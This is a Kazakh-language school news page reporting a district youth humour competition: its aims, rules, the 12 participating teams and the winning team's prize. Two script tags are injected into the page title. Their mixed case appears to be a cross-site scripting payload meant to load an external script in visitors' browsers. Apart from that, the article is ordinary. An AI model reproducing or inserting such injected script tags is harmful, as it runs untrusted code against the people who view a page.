Жайдарман көңілді тапқырлар клубы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.02.2023

17 ақпан күні 8-11 сыныптар аралығында аудандық «Жайдарман көңілді тапқырлар клубы» Шағалалы ауылының агротехникалық колледжінің 55-жылдығына орай өткізілді.

Ойының міндеттері:

- Ұйымдастыру комитетінің  барлық талаптарын орындауға міндетті.

- Ұйымдастыру комитетіне, қарсыластарға, қазылар алқасының мүшелеріне қатысты өзін дұрыс ұстау.

Ойының мақсаты:

- Оқушылардың бастамаларына қолдау көрсетіп, бос уақытын тиімді пайдалануды ұйымдастыру арқылы «Жайдарман» ойындарын балалар мен жасөспірімдер шығармашылығының бірсаласы ретінде насихаттау және әр сынып командалары арасында шығармашылық, достық қарым – қатынасты күшейту.

  8 – 11 сыныптар арасында мектеп ішінен 7 оқушы таңдалып команда құрылды. Жайдарман ережесі бойынша Жаңа Қазақстан тақырыбында 1 кезең сәлемдесу, 2 кезең үй тапсырмасы «Ал, бізде қоңырауда!» тақырыбында оқушылар дайындалды. Ойынға 12 команда қатысты. Ойының қорытындысы бойынша 1 орынды Зеренді ауылының № 1 «Smile kz» командасы иеленді. 1-ші орынға сертификат түрінде 15 мың теңге ақшалай сыйлық берілді.

Просмотров: 706


Пікір қосу



Деректерді қолтаңбаға қосу